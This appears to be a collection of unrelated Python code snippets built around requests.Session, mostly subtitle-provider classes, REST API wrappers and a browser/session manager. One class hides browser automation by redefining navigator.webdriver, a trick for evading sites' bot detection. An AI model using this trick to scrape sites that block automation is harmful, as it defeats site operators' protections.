def test_close(self): cache = mock.Mock(spec=DictCache) sess = Session() sess.mount('http://', CacheControlAdapter(cache)) sess.close() assert cache.close.called
def get_http_request(url, payload, method='POST', headers=None, use_proxy=False, use_proxy_auth=False, trust_env=True): try: session = Session() session.trust_env = trust_env session.proxies = Util.get_proxies() if use_proxy else None session.auth = Util.get_proxy_auth() if use_proxy_auth else None request = Request( 'POST' if method not in ('GET', 'POST') else method, url, data=payload if method == 'POST' else None, params=payload if method == 'GET' else None, headers=headers ) prepped = request.prepare() response = session.send( prepped, timeout=app.config['HTTP_REQUESTS_TIMEOUT'] ) session.close() except Exception, e: response = Response() response.raise_for_status() return response, 'Error al realizar la consulta - Motivo: {}'.format(e.message)
class OneM2MHttpTx(IoTTx): """Implementation of HTTP OneM2M Tx channel""" def __init__(self, encoder, decoder): super(OneM2MHttpTx, self).__init__(encoder, decoder) self.session = None def _start(self): self.session = Session() def _stop(self): if self.session: self.session.close() self.session = None def send(self, jsonprimitive): try: message = self.encoder.encode(jsonprimitive) except IoTDataEncodeError as e: return None rsp_message = self.session.send(message) rsp_primitive = None try: rsp_primitive = self.decoder.decode(rsp_message) except IoTDataDecodeError as e: return None return rsp_primitive
def hit_example_com(self): try: start_time = time() session = Session() http_adapter = HTTPAdapter(max_retries=0) session.mount('http://', http_adapter) session.mount('https://', http_adapter) session.get("http://www.example.com", timeout=30) # # print("Doing a task that is not a request...") # login = Login() # r = login.sw_valid_login(GC.USERNAME, GC.PASSWORD, "http://www.sowatest.com") stats_latency['latency'].append(time() - start_time) events.request_success.fire(request_type="Transaction", name="hit_sowatest", response_time=time() - start_time, response_length=0) session.close() # # Assert Section # assert r.status_code == 200 # assert "Access Denied" in str(html.fromstring(r.text).xpath("//title/text()")) # assert '<div id="blockedBanner">' in r.text except Exception, e: """ * *request_type*: Request type method used * *name*: Path to the URL that was called (or override name if it was used in the call to the client) * *response_time*: Time in milliseconds until exception was thrown * *exception*: Exception instance that was thrown """ events.request_failure.fire(request_type="Transaction", name="hit_sowatest", response_time=time() - start_time, exception=e)
def send_message(self, request): """Transport the message to the server and return the response. :param request: The JSON-RPC request string. :return: The response (a string for requests, None for notifications). """ # Prepare the session session = Session() session_request = Request(method='POST', url=self.endpoint, \ headers=self.headers, data=request, **self.requests_kwargs) prepared_request = session.prepare_request(session_request) prepared_request.headers = dict(list(dict( prepared_request.headers).items()) + list(self.headers.items())) # Log the request self.log_request(request, {'http_headers': prepared_request.headers}) # Send the message try: response = session.send(prepared_request) except RequestException: session.close() raise session.close() # Log the response self.log_response(response.text, {'http_code': response.status_code, \ 'http_reason': response.reason, 'http_headers': response.headers}) return response.text
class PluggitHandler: """ handler is the global network handler for Pluggit. It routes all network requests through it in order to respect Reddit API rules. It keeps all OAuth requests separate as they are based on a per-user_agent rate-limit. """ def __init__(self, debug = False): # Create logger self.logger = logging.getLogger('PluggitHandler') self.logger.setLevel(logging.INFO) if debug: self.logger.setLevel(logging.DEBUG) # Create dict { bearer: last_request_time } self.oauth_dict = {} # Required by PRAW self.session = Session() self.lock = Lock() def __del__(self): if not self.session == None: self.session.close() def request(self, request, proxies, timeout, verify, **kwargs): # Evict oauth_session if more than 1hr old self.oauth_dict = { key:value for key, value in self.oauth_dict.items() if value < (time() + (60 * 60)) } # Get current oauth_session oauth_session = None if 'Authorization' in request.headers: payload = request.headers['Authorization'].split(' ') if payload[0] == 'bearer': oauth_session = payload[1] if not oauth_session == None: # Previously made a request if oauth_session in self.oauth_dict: # Lock to prevent multiple threads requesting from same OAUTH session with self.lock: now = time() wait_time = self.oauth_dict[oauth_session] + 2 - now if wait_time > 0: self.logger.debug(' SESSION: ' + oauth_session + ' SLEEPING: ' + str(wait_time)) now += wait_time sleep(wait_time) self.oauth_dict[oauth_session] = now else: self.oauth_dict[oauth_session] = time() return self.session.send(request, proxies = proxies, timeout = timeout, allow_redirects = False, verify = verify)
class Flowdock: """Simple wrapper for Flowdock REST API.""" API_URL = "https://api.flowdock.com" def __init__(self, api_key, debug=False, print_function=None): """Initialize Flowdock API wrapper. @param debug Print debug info if True @param print_function Use this function to print debug info. By default use python builtin print. Mainly for using click.echo without requiring click as dependency. """ self.session = Session() # requests accepts http basic auth as tuple (user, pass), however, # Flowdoc uses only api key as username without password self.session.auth = (api_key, None) self.debug = debug self.print = print_function if print_function else print def get_organizations(self): """Get list of organizations this user has access to""" url = "{}/organizations".format(self.API_URL) if self.debug: self.print("Sending GET request to URL {}".format(url)) r = self.session.get(url) r.raise_for_status() return r.json() def find_user_orgs(self, email): """Find organizations this user belongs to""" orgs = self.get_organizations() return [org for org in orgs if Flowdock.user_in_org(email, org)] @staticmethod def user_in_org(email, org): """Chek if user is part of organization""" for user in org['users']: if user['email'] == email: return True return False def delete_user_from_org(self, user, org): url = "{}/organizations/{}/users/{}".format(self.API_URL, org['parameterized_name'], user['id']) if self.debug: self.print("Sending DELETE request to url {}".format(url)) r = self.session.delete(url) r.raise_for_status() def close(self): self.session.close()
class TheSubDBProvider(Provider): """TheSubDB Provider.""" languages = {Language.fromthesubdb(l) for l in language_converters['thesubdb'].codes} required_hash = 'thesubdb' server_url = 'http://api.thesubdb.com/' subtitle_class = TheSubDBSubtitle def __init__(self): self.session = None def initialize(self): self.session = Session() self.session.headers['User-Agent'] = ('SubDB/1.0 (subliminal/%s; https://github.com/Diaoul/subliminal)' % __short_version__) def terminate(self): self.session.close() def query(self, hash): # make the query params = {'action': 'search', 'hash': hash} logger.info('Searching subtitles %r', params) r = self.session.get(self.server_url, params=params, timeout=10) # handle subtitles not found and errors if r.status_code == 404: logger.debug('No subtitles found') return [] r.raise_for_status() # loop over languages subtitles = [] for language_code in r.text.split(','): language = Language.fromthesubdb(language_code) subtitle = self.subtitle_class(language, hash) logger.debug('Found subtitle %r', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): return [s for s in self.query(video.hashes['thesubdb']) if s.language in languages] def download_subtitle(self, subtitle): logger.info('Downloading subtitle %r', subtitle) params = {'action': 'download', 'hash': subtitle.hash, 'language': subtitle.language.alpha2} r = self.session.get(self.server_url, params=params, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)
def getCurrencys(): result = None s = Session() try: resp = s.get(BASE_URL+CURRENCIES, params={'app_id': APP_ID}) currencys = json.loads(resp.text) result = currencys except Exception as e: result = None finally: s.close() return result
def getRates(): result = None s = Session() try: resp = s.get(BASE_URL+LATEST_RATES, params={'app_id': APP_ID}) raw_rates_json = json.loads(resp.text) result = raw_rates_json except Exception as e: result = None finally: s.close() return result
class NapiProjektProvider(Provider): """NapiProjekt Provider.""" languages = {Language.fromalpha2(l) for l in ['pl']} required_hash = 'napiprojekt' server_url = 'http://napiprojekt.pl/unit_napisy/dl.php' subtitle_class = NapiProjektSubtitle def __init__(self): self.session = None def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__ def terminate(self): self.session.close() def query(self, language, hash): params = { 'v': 'dreambox', 'kolejka': 'false', 'nick': '', 'pass': '', 'napios': 'Linux', 'l': language.alpha2.upper(), 'f': hash, 't': get_subhash(hash)} logger.info('Searching subtitle %r', params) r = self.session.get(self.server_url, params=params, timeout=10) r.raise_for_status() # handle subtitles not found and errors if r.content[:4] == b'NPc0': logger.debug('No subtitles found') return None subtitle = self.subtitle_class(language, hash) subtitle.content = r.content logger.debug('Found subtitle %r', subtitle) return subtitle def list_subtitles(self, video, languages): return [s for s in [self.query(l, video.hashes['napiprojekt']) for l in languages] if s is not None] def download_subtitle(self, subtitle): # there is no download step, content is already filled from listing subtitles pass
class TheSubDBProvider(Provider): languages = {Language.fromthesubdb(l) for l in language_converters["thesubdb"].codes} required_hash = "thesubdb" server_url = "http://api.thesubdb.com/" def initialize(self): self.session = Session() self.session.headers = { "User-Agent": "SubDB/1.0 (subliminal/%s; https://github.com/Diaoul/subliminal)" % get_version(__version__) } def terminate(self): self.session.close() def query(self, hash): # make the query params = {"action": "search", "hash": hash} logger.info("Searching subtitles %r", params) r = self.session.get(self.server_url, params=params, timeout=10) # handle subtitles not found and errors if r.status_code == 404: logger.debug("No subtitles found") return [] r.raise_for_status() # loop over languages subtitles = [] for language_code in r.text.split(","): language = Language.fromthesubdb(language_code) subtitle = TheSubDBSubtitle(language, hash) logger.debug("Found subtitle %r", subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): return [s for s in self.query(video.hashes["thesubdb"]) if s.language in languages] def download_subtitle(self, subtitle): logger.info("Downloading subtitle %r", subtitle) params = {"action": "download", "hash": subtitle.hash, "language": subtitle.language.alpha2} r = self.session.get(self.server_url, params=params, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)
class ShooterProvider(Provider): """Shooter Provider.""" languages = {Language(l) for l in ['eng', 'zho']} server_url = 'https://www.shooter.cn/api/subapi.php' subtitle_class = ShooterSubtitle def __init__(self): self.session = None def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/%s' % __short_version__ def terminate(self): self.session.close() def query(self, language, filename, hash=None): # query the server params = {'filehash': hash, 'pathinfo': os.path.realpath(filename), 'format': 'json', 'lang': language.shooter} logger.debug('Searching subtitles %r', params) r = self.session.post(self.server_url, params=params, timeout=10) r.raise_for_status() # handle subtitles not found if r.content == b'\xff': logger.debug('No subtitles found') return [] # parse the subtitles results = json.loads(r.text) subtitles = [self.subtitle_class(language, hash, t['Link']) for s in results for t in s['Files']] return subtitles def list_subtitles(self, video, languages): return [s for l in languages for s in self.query(l, video.name, video.hashes.get('shooter'))] def download_subtitle(self, subtitle): logger.info('Downloading subtitle %r', subtitle) r = self.session.get(subtitle.download_link, timeout=10) r.raise_for_status() subtitle.content = fix_line_ending(r.content)
def try_request(self, request): """Place a secure request and get back an object of type T. Args: request: Result object of the request Returns: result: request response """ timestamp = int(time()) hash = create_secure_hash(timestamp, self.token) request.auth = (self.userId, hash) request.headers.update({'Timestamp': str(timestamp)}) request.url = self.client + request.url try: session = Session() response = session.send(request.prepare()) session.close() return response.json() except: exception('Failed to make REST request to {0}'.format(request.url)) return { 'success': False }
class HTMLFetcher(BaseFetcher): ''' A fetcher which uses requests to return source html of a webpage without rendering JS. Faster but less thourough than JSFetcher ''' def setup(self, timeout): self.timeout = timeout self.session = Session() def teardown(self): self.session.close() return None def get(self, url): logging.info("retrieving: " + url) try: rsp = self.session.get(url, timeout=self.timeout) if not rsp: return '' return rsp.text except Exception as e: logging.warn("caught <{0}> while retrieving <{1}>".format(e.__traceback__, url)) return ''
def _request_api(self, path, data=None, method="GET"): """Helper method for making a REST-compliant API call. Args: path: path on the server to call data: dictionary of data to send to the server in message body method: - HTTP verb to use for the request Returns: the JSON-parsed result body """ complete_path = self.api_endpoint + path session = Session() session.headers.update(self.headers) try: response = session.request(method, complete_path, json=data) finally: session.close() if 200 <= response.status_code < 300 or self._has_error(response.json()): if response.text == '': return {} return response.json() elif response.status_code in ERROR_MESSAGES: return {'error': ERROR_MESSAGES[response.status_code]} logger.warn("Querying the API failed when accessing '%s': %d", complete_path, response.status_code) return {'error': { 'message': "internal_server_error", 'description': "We are very sorry, but something went wrong", 'code': 90000}}
class TVsubtitlesProvider(Provider): """TVsubtitles Provider.""" languages = {Language('por', 'BR')} | { Language(l) for l in [ 'ara', 'bul', 'ces', 'dan', 'deu', 'ell', 'eng', 'fin', 'fra', 'hun', 'ita', 'jpn', 'kor', 'nld', 'pol', 'por', 'ron', 'rus', 'spa', 'swe', 'tur', 'ukr', 'zho' ] } video_types = (Episode, ) server_url = 'http://www.tvsubtitles.net/' subtitle_class = TVsubtitlesSubtitle def __init__(self): self.session = None def initialize(self): self.session = Session() self.session.headers[ 'User-Agent'] = 'Subliminal/%s' % __short_version__ def terminate(self): self.session.close() @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def search_show_id(self, series, year=None): """Search the show id from the `series` and `year`. :param str series: series of the episode. :param year: year of the series, if any. :type year: int :return: the show id, if any. :rtype: int """ # make the search logger.info('Searching show id for %r', series) r = self.session.post(self.server_url + 'search.php', data={'q': series}, timeout=10) r.raise_for_status() # get the series out of the suggestions soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) show_id = None for suggestion in soup.select('div.left li div a[href^="/tvshow-"]'): match = link_re.match(suggestion.text) if not match: logger.error('Failed to match %s', suggestion.text) continue if match.group('series').lower() == series.lower(): if year is not None and int(match.group('first_year')) != year: logger.debug('Year does not match') continue show_id = int(suggestion['href'][8:-5]) logger.debug('Found show id %d', show_id) break return show_id @region.cache_on_arguments(expiration_time=EPISODE_EXPIRATION_TIME) def get_episode_ids(self, show_id, season): """Get episode ids from the show id and the season. :param int show_id: show id. :param int season: season of the episode. :return: episode ids per episode number. :rtype: dict """ # get the page of the season of the show logger.info('Getting the page of show id %d, season %d', show_id, season) r = self.session.get(self.server_url + 'tvshow-%d-%d.html' % (show_id, season), timeout=10) soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over episode rows episode_ids = {} for row in soup.select('table#table5 tr'): # skip rows that do not have a link to the episode page if not row('a', href=episode_id_re): continue # extract data from the cells cells = row('td') episode = int(cells[0].text.split('x')[1]) episode_id = int(cells[1].a['href'][8:-5]) episode_ids[episode] = episode_id if episode_ids: logger.debug('Found episode ids %r', episode_ids) else: logger.warning('No episode ids found') return episode_ids def query(self, show_id, series, season, episode, year=None): # get the episode ids episode_ids = self.get_episode_ids(show_id, season) if episode not in episode_ids: logger.error('Episode %d not found', episode) return [] # get the episode page logger.info('Getting the page for episode %d', episode_ids[episode]) r = self.session.get(self.server_url + 'episode-%d.html' % episode_ids[episode], timeout=10) soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) # loop over subtitles rows subtitles = [] for row in soup.select('.subtitlen'): # read the item language = Language.fromtvsubtitles(row.h5.img['src'][13:-4]) subtitle_id = int(row.parent['href'][10:-5]) page_link = self.server_url + 'subtitle-%d.html' % subtitle_id rip = row.find('p', title='rip').text.strip() or None release = row.find('h5').text.strip() or None subtitle = self.subtitle_class(language, page_link, subtitle_id, series, season, episode, year, rip, release) logger.debug('Found subtitle %s', subtitle) subtitles.append(subtitle) return subtitles def list_subtitles(self, video, languages): # lookup show_id titles = [video.series] + video.alternative_series show_id = None for title in titles: show_id = self.search_show_id(title, video.year) if show_id is not None: break # query for subtitles with the show_id if show_id is not None: subtitles = [ s for s in self.query(show_id, title, video.season, video.episode, video.year) if s.language in languages and s.episode == video.episode ] if subtitles: return subtitles else: logger.error('No show id found for %r (%r)', video.series, {'year': video.year}) return [] def download_subtitle(self, subtitle): # download as a zip logger.info('Downloading subtitle %r', subtitle) r = self.session.get(self.server_url + 'download-%d.html' % subtitle.subtitle_id, timeout=10) r.raise_for_status() # open the zip with ZipFile(io.BytesIO(r.content)) as zf: if len(zf.namelist()) > 1: raise ProviderError('More than one file to unzip') subtitle.content = fix_line_ending(zf.read(zf.namelist()[0]))
class Drission(object): """Drission类用于管理WebDriver对象和Session对象,是驱动器的角色""" def __init__(self, driver_or_options: Union[WebDriver, dict, Options, DriverOptions] = None, session_or_options: Union[Session, dict, SessionOptions] = None, ini_path: str = None, proxy: dict = None): """初始化,可接收现成的WebDriver和Session对象,或接收它们的配置信息生成对象 \n :param driver_or_options: driver对象或chrome设置,Options类或设置字典 :param session_or_options: Session对象或设置 :param ini_path: ini文件路径 :param proxy: 代理设置 """ self._session = None self._driver = None self._debugger = None self._proxy = proxy om = OptionsManager( ini_path ) if session_or_options is None or driver_or_options is None else None # ------------------处理session options---------------------- if session_or_options is None: self._session_options = om.session_options else: # 若接收到Session对象,直接记录 if isinstance(session_or_options, Session): self._session = session_or_options # 否则记录其配置信息 else: self._session_options = _session_options_to_dict( session_or_options) # ------------------处理driver options---------------------- if driver_or_options is None: self._driver_options = om.chrome_options self._driver_options['driver_path'] = om.get_value( 'paths', 'chromedriver_path') else: # 若接收到WebDriver对象,直接记录 if isinstance(driver_or_options, WebDriver): self._driver = driver_or_options # 否则记录其配置信息 else: self._driver_options = _chrome_options_to_dict( driver_or_options) @property def session(self) -> Session: """返回Session对象,如未初始化则按配置信息创建""" if self._session is None: self._set_session(self._session_options) if self._proxy: self._session.proxies = self._proxy return self._session @property def driver(self) -> WebDriver: """返回WebDriver对象,如未初始化则按配置信息创建。 \n 如设置了本地调试浏览器,可自动接入或打开浏览器进程。 """ if self._driver is None: if isinstance(self._driver_options, dict): options = _dict_to_chrome_options(self._driver_options) else: raise TypeError('Driver options invalid') if self._proxy: options.add_argument(f'--proxy-server={self._proxy["http"]}') driver_path = self._driver_options.get('driver_path', None) or 'chromedriver' chrome_path = self._driver_options.get('binary_location', None) or 'chrome.exe' # -----------若指定debug端口且该端口未在使用中,则先启动浏览器进程----------- if options.debugger_address and _check_port( options.debugger_address) is False: from subprocess import Popen port = options.debugger_address[options.debugger_address. rfind(':') + 1:] try: self._debugger = Popen( f'{chrome_path} --remote-debugging-port={port}', shell=False) if chrome_path == 'chrome.exe': from common import get_exe_path_from_port chrome_path = get_exe_path_from_port(port) # 启动不了进程,主动找浏览器执行文件启动 except FileNotFoundError: from DrissionPage.easy_set import _get_chrome_path chrome_path = _get_chrome_path(show_msg=False) if not chrome_path: raise FileNotFoundError('无法找到chrome.exe路径,请手动配置。') self._debugger = Popen( f'"{chrome_path}" --remote-debugging-port={port}', shell=False) # -----------创建WebDriver对象----------- try: self._driver = webdriver.Chrome(driver_path, options=options) # 若版本不对,获取对应chromedriver再试 except (WebDriverException, SessionNotCreatedException): from .easy_set import get_match_driver chrome_path = None if chrome_path == 'chrome.exe' else chrome_path driver_path = get_match_driver(chrome_path=chrome_path, check_version=False, show_msg=False) if driver_path: try: self._driver = webdriver.Chrome(driver_path, options=options) except: print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。') exit(0) # 当找不到driver且chrome_path为None时,说明安装的版本过高,改在系统路径中查找 elif chrome_path is None and driver_path is None: from DrissionPage.easy_set import _get_chrome_path chrome_path = _get_chrome_path(show_msg=False, from_ini=False, from_regedit=False) driver_path = get_match_driver(chrome_path=chrome_path, check_version=False, show_msg=False) if driver_path: options.binary_location = chrome_path try: self._driver = webdriver.Chrome(driver_path, options=options) except: print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。') exit(0) else: print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。') exit(0) else: print('无法启动,请检查chromedriver版本与Chrome是否匹配,并手动设置。') exit(0) # 反反爬设置 try: self._driver.execute_script( 'Object.defineProperty(navigator,"webdriver",{get:() => Chrome,});' ) except: pass # self._driver.execute_cdp_cmd( # 'Page.addScriptToEvaluateOnNewDocument', # {'source': 'Object.defineProperty(navigator,"webdriver",{get:() => Chrome,});'}) return self._driver @property def debugger_progress(self): """调试浏览器进程""" return self._debugger @property def driver_options(self) -> dict: """返回driver配置信息""" return self._driver_options @property def session_options(self) -> dict: """返回session配置信息""" return self._session_options @session_options.setter def session_options(self, options: Union[dict, SessionOptions]) -> None: """设置session配置 \n :param options: session配置字典 :return: None """ self._session_options = _session_options_to_dict(options) self._set_session(self._session_options) @property def proxy(self) -> Union[None, dict]: """返回代理信息""" return self._proxy @proxy.setter def proxy(self, proxies: dict = None) -> None: """设置代理信息 \n :param proxies: 代理信息字典 :return: None """ self._proxy = proxies if self._session: self._session.proxies = proxies if self._driver: cookies = self._driver.get_cookies() url = self._driver.current_url self._driver.quit() self._driver = None self._driver = self.driver self._driver.get(url) for cookie in cookies: self.set_cookies(cookie, set_driver=True) def set_cookies(self, cookies: Union[RequestsCookieJar, list, tuple, str, dict], set_session: bool = False, set_driver: bool = False) -> None: """设置cookies \n :param cookies: cookies信息,可为CookieJar, list, tuple, str, dict :param set_session: 是否设置session的cookies :param set_driver: 是否设置driver的cookies :return: None """ cookies = _cookies_to_tuple(cookies) for cookie in cookies: if cookie['value'] is None: cookie['value'] = '' # 添加cookie到session if set_session: kwargs = { x: cookie[x] for x in cookie if x.lower() not in ('name', 'value', 'httponly', 'expiry', 'samesite') } if 'expiry' in cookie: kwargs['expires'] = cookie['expiry'] self.session.cookies.set(cookie['name'], cookie['value'], **kwargs) # 添加cookie到driver if set_driver: if 'expiry' in cookie: cookie['expiry'] = int(cookie['expiry']) try: browser_domain = extract(self.driver.current_url).fqdn except AttributeError: browser_domain = '' if not cookie.get('domain', None): if browser_domain: url = extract(browser_domain) cookie_domain = f'{url.domain}.{url.suffix}' else: raise ValueError( 'There is no domain name in the cookie or the browser has not visited a URL.' ) cookie['domain'] = cookie_domain else: cookie_domain = cookie['domain'] if cookie['domain'][ 0] != '.' else cookie['domain'][1:] if cookie_domain not in browser_domain: self.driver.get(cookie_domain if cookie_domain.startswith( 'http://') else f'http://{cookie_domain}') # 避免selenium自动添加.后无法正确覆盖已有cookie if cookie['domain'][0] != '.': c = self.driver.get_cookie(cookie['name']) if c and c['domain'] == cookie['domain']: self.driver.delete_cookie(cookie['name']) self.driver.add_cookie(cookie) def _set_session(self, data: dict) -> None: if self._session is None: self._session = Session() attrs = [ 'headers', 'auth', 'proxies', 'hooks', 'params', 'verify', 'cert', 'stream', 'trust_env', 'max_redirects' ] # , 'adapters' if 'cookies' in data: self.set_cookies(data['cookies'], set_session=True) for i in attrs: if i in data: self._session.__setattr__(i, data[i]) def cookies_to_session(self, copy_user_agent: bool = False) -> None: """把driver对象的cookies复制到session对象 \n :param copy_user_agent: 是否复制ua信息 :return: None """ if copy_user_agent: self.user_agent_to_session(self.driver, self.session) self.set_cookies(self.driver.get_cookies(), set_session=True) def cookies_to_driver(self, url: str) -> None: """把session对象的cookies复制到driver对象 \n :param url: 作用域 :return: None """ browser_domain = extract(self.driver.current_url).fqdn ex_url = extract(url) if ex_url.fqdn not in browser_domain: self.driver.get(url) domain = f'{ex_url.domain}.{ex_url.suffix}' cookies = [] for cookie in self.session.cookies: if cookie.domain == '': cookie.domain = domain if domain in cookie.domain: cookies.append(cookie) self.set_cookies(cookies, set_driver=True) def user_agent_to_session(self, driver: WebDriver = None, session: Session = None) -> None: """把driver的user-agent复制到session \n :param driver: 来源driver对象 :param session: 目标session对象 :return: None """ driver = driver or self.driver session = session or self.session selenium_user_agent = driver.execute_script( "return navigator.userAgent;") session.headers.update({"User-Agent": selenium_user_agent}) def close_driver(self) -> None: """关闭driver和浏览器""" if self._driver: self._driver.quit() self._driver = None def close_session(self) -> None: """关闭session""" if self._session: self._session.close() self._session = None def close(self) -> None: """关闭session、driver和浏览器""" if self._driver: self.close_driver() if self._session: self.close_session() def __del__(self): """关闭对象时关闭浏览器和Session""" try: self.close() except ImportError: pass
class SubsCenterProvider(Provider): """SubsCenter Provider.""" languages = {Language.fromalpha2(l) for l in ['he']} server_url = 'http://www.subscenter.info/he/' def __init__(self, username=None, password=None): if username is not None and password is None or username is None and password is not None: raise ConfigurationError('Username and password must be specified') self.session = None self.username = username self.password = password self.logged_in = False def initialize(self): self.session = Session() self.session.headers['User-Agent'] = 'Subliminal/{}'.format( __short_version__) # login if self.username is not None and self.password is not None: logger.debug('Logging in') url = self.server_url + 'subscenter/accounts/login/' # retrieve CSRF token self.session.get(url) csrf_token = self.session.cookies['csrftoken'] # actual login data = { 'username': self.username, 'password': self.password, 'csrfmiddlewaretoken': csrf_token } r = self.session.post(url, data, allow_redirects=False, timeout=10) if r.status_code != 302: raise AuthenticationError(self.username) logger.info('Logged in') self.logged_in = True def terminate(self): # logout if self.logged_in: logger.info('Logging out') r = self.session.get(self.server_url + 'subscenter/accounts/logout/', timeout=10) r.raise_for_status() logger.info('Logged out') self.logged_in = False self.session.close() @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_url_titles(self, title): """Search the URL titles by kind for the given `title`. :param str title: title to search for. :return: the URL titles by kind. :rtype: collections.defaultdict """ # make the search logger.info('Searching title name for %r', title) r = self.session.get(self.server_url + 'subtitle/search/', params={'q': title}, timeout=10) r.raise_for_status() # check for redirections if r.history and all([h.status_code == 302 for h in r.history]): logger.debug('Redirected to the subtitles page') links = [r.url] else: # get the suggestions (if needed) soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) links = [ link.attrs['href'] for link in soup.select('#processes div.generalWindowTop a') ] logger.debug('Found %d suggestions', len(links)) url_titles = defaultdict(list) for link in links: parts = link.split('/') url_titles[parts[-3]].append(parts[-2]) return url_titles def query(self, title, season=None, episode=None): # search for the url title url_titles = self._search_url_titles(title) # episode if season and episode: if 'series' not in url_titles: logger.error('No URL title found for series %r', title) return [] url_title = url_titles['series'][0] logger.debug('Using series title %r', url_title) url = self.server_url + 'cst/data/series/sb/{}/{}/{}/'.format( url_title, season, episode) page_link = self.server_url + 'subtitle/series/{}/{}/{}/'.format( url_title, season, episode) else: if 'movie' not in url_titles: logger.error('No URL title found for movie %r', title) return [] url_title = url_titles['movie'][0] logger.debug('Using movie title %r', url_title) url = self.server_url + 'cst/data/movie/sb/{}/'.format(url_title) page_link = self.server_url + 'subtitle/movie/{}/'.format( url_title) # get the list of subtitles logger.debug('Getting the list of subtitles') r = self.session.get(url) r.raise_for_status() results = json.loads(r.text) # loop over results subtitles = {} for language_code, language_data in results.items(): for quality_data in language_data.values(): for quality, subtitles_data in quality_data.items(): for subtitle_item in subtitles_data.values(): # read the item language = Language.fromalpha2(language_code) hearing_impaired = bool( subtitle_item['hearing_impaired']) subtitle_id = subtitle_item['id'] subtitle_key = subtitle_item['key'] subtitle_version = subtitle_item['h_version'] downloaded = subtitle_item['downloaded'] release = subtitle_item['subtitle_version'] # add the release and increment downloaded count if we already have the subtitle if subtitle_id in subtitles: logger.debug( 'Found additional release %r for subtitle %d', release, subtitle_id) bisect.insort_left(subtitles[subtitle_id].releases, release) # deterministic order subtitles[subtitle_id].downloaded += downloaded continue # otherwise create it subtitle = SubsCenterSubtitle( language, hearing_impaired, page_link, title, season, episode, title, subtitle_id, subtitle_key, subtitle_version, downloaded, [release]) logger.debug('Found subtitle %r', subtitle) subtitles[subtitle_id] = subtitle return subtitles.values() def list_subtitles(self, video, languages): season = episode = None title = video.title if isinstance(video, Episode): title = video.series season = video.season episode = video.episode return [ s for s in self.query(title, season, episode) if s.language in languages ] def download_subtitle(self, subtitle): # download url = self.server_url + 'subtitle/download/{}/{}/'.format( subtitle.language.alpha2, subtitle.subtitle_id) params = {'v': subtitle.subtitle_version, 'key': subtitle.subtitle_key} r = self.session.get(url, params=params, headers={'Referer': subtitle.page_link}, timeout=10) r.raise_for_status() # open the zip try: with zipfile.ZipFile(io.BytesIO(r.content)) as zf: # remove some filenames from the namelist namelist = [n for n in zf.namelist() if not n.endswith('.txt')] if len(namelist) > 1: raise ProviderError('More than one file to unzip') subtitle.content = fix_line_ending(zf.read(namelist[0])) except zipfile.BadZipfile: # if no zip file was retrieved, daily downloads limit has exceeded raise ProviderError('Daily limit exceeded')
class SubsCenterProvider(Provider): languages = {Language.fromalpha2(l) for l in ['he']} server = 'http://subscenter.cinemast.com/he/' def __init__(self, username=None, password=None): if username is not None and password is None or username is None and password is not None: raise ConfigurationError('Username and password must be specified') self.username = username self.password = password self.logged_in = False def initialize(self): self.session = Session() self.session.headers = { 'User-Agent': 'Subliminal/%s' % get_version(__version__) } # login if self.username is not None and self.password is not None: logger.debug('Logging in') url = self.server + 'subscenter/accounts/login/' # retrieve CSRF token self.session.get(url) csrf_token = self.session.cookies['csrftoken'] # actual login data = { 'username': self.username, 'password': self.password, 'csrfmiddlewaretoken': csrf_token } r = self.session.post(url, data, allow_redirects=False, timeout=10) if r.status_code != 302: raise AuthenticationError(self.username) logger.info('Logged in') self.logged_in = True def terminate(self): # logout if self.logged_in: logger.info('Logging out') r = self.session.get(self.server + 'subscenter/accounts/logout/', timeout=10) r.raise_for_status() logger.info('Logged out') self.logged_in = False self.session.close() @region.cache_on_arguments(expiration_time=SHOW_EXPIRATION_TIME) def _search_url_title(self, title, kind): """Search the URL title for the given `title`. :param str title: title to search for. :param str kind: kind of the title, ``movie`` or ``series``. :return: the URL version of the title. :rtype: str or None """ # make the search logger.info('Searching title name for %r', title) r = self.session.get(self.server + 'subtitle/search/', params={'q': title}, allow_redirects=False, timeout=10) r.raise_for_status() # if redirected, get the url title from the Location header if r.is_redirect: parts = r.headers['Location'].split('/') # check kind if parts[-3] == kind: return parts[-2] return None # otherwise, get the first valid suggestion soup = ParserBeautifulSoup(r.content, ['lxml', 'html.parser']) suggestions = soup.select('#processes div.generalWindowTop a') logger.debug('Found %d suggestions', len(suggestions)) for suggestion in suggestions: parts = suggestion.attrs['href'].split('/') # check kind if parts[-3] == kind: return parts[-2] def query(self, series=None, season=None, episode=None, title=None): # set the correct parameters depending on the kind if series and season and episode: url_series = self._search_url_title(series, 'series') url = self.server + 'cinemast/data/series/sb/{}/{}/{}/'.format( url_series, season, episode) page_link = self.server + 'subtitle/series/{}/{}/{}/'.format( url_series, season, episode) elif title: url_title = self._search_url_title(title, 'movie') url = self.server + 'cinemast/data/movie/sb/{}/'.format(url_title) page_link = self.server + 'subtitle/movie/{}/'.format(url_title) else: raise ValueError('One or more parameters are missing') # get the list of subtitles logger.debug('Getting the list of subtitles') r = self.session.get(url) r.raise_for_status() results = json.loads(r.text) # loop over results subtitles = {} for language_code, language_data in results.items(): for quality_data in language_data.values(): for quality, subtitles_data in quality_data.items(): for subtitle_item in subtitles_data.values(): # read the item language = Language.fromalpha2(language_code) hearing_impaired = bool( subtitle_item['hearing_impaired']) subtitle_id = subtitle_item['id'] subtitle_key = subtitle_item['key'] downloaded = subtitle_item['downloaded'] release = subtitle_item['subtitle_version'] # add the release and increment downloaded count if we already have the subtitle if subtitle_id in subtitles: logger.debug( 'Found additional release %r for subtitle %d', release, subtitle_id) bisect.insort_left(subtitles[subtitle_id].releases, release) # deterministic 